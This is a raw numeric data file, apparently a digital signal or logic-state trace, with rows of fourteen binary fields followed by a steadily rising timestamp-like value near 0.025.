1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934948e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934996e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935020e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935052e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935072e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935096e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935148e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935196e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935220e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935248e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935272e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935296e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935348e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935424e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935448e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935548e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935624e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935652e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935676e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935700e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935748e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935800e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935824e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935848e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935876e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935900e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935948e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4935972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4935996e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936024e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936052e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936076e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936100e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936148e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936200e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936224e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936252e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936276e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936348e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936400e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936424e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936448e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936548e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936624e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936652e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936676e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936696e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936748e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936796e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936824e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936852e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936872e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936896e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936948e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4936972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4936996e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4937024e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4937048e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4937072e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4937096e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4937124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4937148e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4937172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4937196e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4937220e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4937252e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4937272e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4937296e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4937324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4937348e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4937372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4937396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4937420e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4937452e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4937472e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4937496e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4937524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4937548e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4937572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4937596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4937620e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4937648e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4937672e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4937696e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4937724e-02 1,0,1,1,0,0,0,0,0,1,0,0,0,0,2.4937748e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.4937752e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,2.5062516e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,1,2.5062700e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,2.5062716e-02 0,1,1,1,0,1,0,0,0,1,0,1,0,1,2.5062748e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,2.5062772e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,1,2.5063092e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,2.5063116e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.5063124e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,2.5063140e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.5063164e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,2.5063192e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.5063216e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,2.5063244e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.5063268e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,2.5063292e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.5063316e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,2.5063340e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5063348e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5063364e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5063392e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5063416e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5063444e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5063468e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5063516e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5063540e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5063548e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5063568e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5063592e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5063644e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5063668e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5063676e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5063692e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5063716e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5063740e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5063764e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5063792e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5063812e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5063840e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5063864e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5063892e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5063916e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5063940e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5063964e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5063988e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064012e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064040e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064064e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064092e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064116e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064140e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064164e-02 0,1,1,1,0,0,0,0,0,1,0,0,0,0,2.5064168e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5064172e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5064216e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5064240e-02 0,1,1,1,0,1,0,0,0,0,0,0,0,0,2.5064244e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064248e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064264e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064292e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064316e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064340e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064364e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064388e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064412e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064440e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064468e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064492e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064516e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064540e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064564e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064592e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5064596e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5064644e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5064668e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064676e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064692e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064716e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064740e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064764e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064792e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064816e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064844e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064868e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064892e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064916e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064940e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5064964e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5064992e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065016e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065044e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065068e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065092e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065116e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065168e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065192e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5065196e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5065220e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5065244e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065252e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065268e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065292e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065316e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065340e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065364e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065392e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065416e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065444e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065468e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065492e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065516e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065540e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065568e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065592e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065616e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065644e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065668e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065692e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065716e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065740e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065764e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065792e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065820e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065844e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065868e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065892e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065916e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065940e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5065968e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5065992e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066020e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066044e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066092e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066116e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5066124e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5066140e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5066164e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5066220e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5066244e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066252e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066268e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066292e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066316e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066340e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066364e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066392e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066416e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066444e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066468e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066492e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066516e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066540e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066568e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066588e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066612e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066640e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066668e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066692e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066716e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066740e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066764e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066788e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5066796e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.5066840e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5066864e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066872e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066892e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066916e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066940e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5066964e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5066988e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067012e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067040e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067064e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067092e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067116e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067140e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067164e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067188e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067212e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067240e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067264e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067292e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067312e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067340e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067364e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067388e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067412e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067436e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067464e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067488e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067512e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067540e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067564e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067588e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067612e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067636e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067664e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067688e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067712e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067740e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067764e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067788e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067812e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067836e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067864e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067888e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067912e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067940e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5067964e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5067988e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068012e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068040e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068064e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068092e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068112e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068140e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068164e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068188e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068212e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068240e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068264e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068292e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068316e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068340e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068364e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068388e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068412e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068440e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068464e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068492e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068516e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068540e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068564e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068588e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068612e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068640e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068664e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068692e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068716e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068740e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068764e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068788e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068812e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068840e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068864e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068892e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068916e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068940e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5068964e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5068988e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5069012e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5069040e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5069064e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5069092e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5069112e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5069140e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5069164e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5069188e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5069212e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5069240e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5069264e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5069292e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5069312e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5069340e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5069364e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5069388e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5069412e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5069440e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5069464e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5069488e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5069512e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5069540e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5069564e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5069588e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5069612e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.5069636e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.5069660e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.5069668e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,2.5194420e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,2.5194636e-02 1,1,1,1,0,1,0,0,0,1,0,1,0,1,2.5194664e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,2.5194688e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,1,2.5195004e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,2.5195028e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.5195036e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,2.5195052e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.5195076e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,2.5195100e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.5195128e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,2.5195152e-02 